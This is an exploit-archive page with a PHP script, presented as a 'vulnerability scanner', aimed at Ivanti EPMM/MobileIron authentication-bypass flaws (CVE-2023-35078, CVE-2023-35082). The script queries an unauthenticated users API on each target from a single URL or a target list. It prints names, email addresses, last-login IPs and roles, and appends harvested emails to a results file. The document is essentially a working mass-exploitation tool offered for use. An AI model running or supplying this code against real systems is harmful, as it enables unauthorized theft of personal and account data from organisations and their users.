Share
## https://sploitus.com/exploit?id=PACKETSTORM:214323
=============================================================================================================================================
    | # Title     : Ivanti 11.10 MobileIron Vulnerability Scanner                                                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://help.ivanti.com/iv/help/en_US/RS/vNow/Version-11-10-00-Release-Notes.htm                                            |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/213672/ & 	CVE-2023-35078, CVE-2023-35082
    
    [+] Summary    : This PHP-based scanner detects unauthenticated access vulnerabilities in Ivanti EPMM / MobileIron products. The issue allows attackers to
                     retrieve sensitive user information via exposed API endpoints.	
    
    [+] PoC : php poc.php -u https://target.com -v
    
                          -f targets.txt -o result.txt
    
    <?php
    
    ini_set("display_errors", 0);
    error_reporting(0);
    
    $vulnerabilities = [
        "mifs/asfV3" => "CVE-2023-35082",
        "mifs/aad"   => "CVE-2023-35078"
    ];
    
    $timeout = 5;
    $userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
    
    function fetchData($baseUrl, $path, $timeout, $userAgent) {
        $url = rtrim($baseUrl, "/") . "/$path/api/v2/authorized/users?adminDeviceSpaceId=1";
    
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_TIMEOUT => $timeout,
            CURLOPT_HTTPHEADER => [
                "User-Agent: $userAgent",
                "Accept: application/json"
            ]
        ]);
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        if (!$response) {
            return null;
        }
    
        $json = json_decode($response, true);
        return is_array($json) ? $json : null;
    }
    
    function processUrl($baseUrl, $verbose = false, $outputFile = null) {
        global $vulnerabilities, $timeout, $userAgent;
    
        $parsed = parse_url($baseUrl);
        $scheme = $parsed["scheme"] ?? "http";
        $host   = $parsed["host"];
        $port   = $parsed["port"] ?? ($scheme === "https" ? 443 : 80);
    
        $foundCVEs = [];
        $validData = null;
        $validUrl  = null;
    
        foreach ($vulnerabilities as $path => $cve) {
    
            $tests = ($cve === "CVE-2023-35082")
                ? [[$port, $scheme], [8080, "http"], [8080, "https"]]
                : [[$port, $scheme]];
    
            foreach ($tests as [$p, $s]) {
                $url = "$s://$host:$p";
    
                if ($verbose) {
                    echo "[*] Testing $url/$path\n";
                }
    
                $data = fetchData($url, $path, $timeout, $userAgent);
                if ($data) {
                    $foundCVEs[] = $cve;
                    $validData = $data;
                    $validUrl  = $url;
                }
            }
        }
    
        if ($validData) {
            processData($validUrl, array_unique($foundCVEs), $validData, $verbose, $outputFile);
        }
    }
    
    function processData($baseUrl, $cves, $data, $verbose, $outputFile) {
        echo "[!] $baseUrl MAY BE VULNERABLE TO: " . implode(", ", $cves) . "\n";
    
        $results = $data["results"] ?? $data["result"] ?? [];
        $emails = [];
    
        foreach ($results as $user) {
            $email = $user["email"] ?? null;
            if ($email) {
                $emails[] = $email;
    
                if ($verbose) {
                    echo "Name : {$user['displayName']}\n";
                    echo "Email: $email\n";
                    echo "IP   : {$user['lastLoginIp']}\n";
                    echo "Roles: " . implode(", ", $user["roles"]) . "\n";
                    echo str_repeat("-", 40) . "\n";
                }
            }
        }
    
        $emails = array_unique($emails);
    
        if ($outputFile) {
            file_put_contents(
                $outputFile,
                "$baseUrl [" . implode(",", $cves) . "] " . implode(",", array_slice($emails, 0, 5)) . PHP_EOL,
                FILE_APPEND
            );
        }
    }
    
    $options = getopt("u:f:o:v");
    
    if (isset($options["u"])) {
        processUrl($options["u"], isset($options["v"]), $options["o"] ?? null);
    }
    
    if (isset($options["f"])) {
        $urls = file($options["f"], FILE_IGNORE_NEW_LINES);
        foreach ($urls as $url) {
            processUrl(trim($url), isset($options["v"]), $options["o"] ?? null);
        }
    }
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================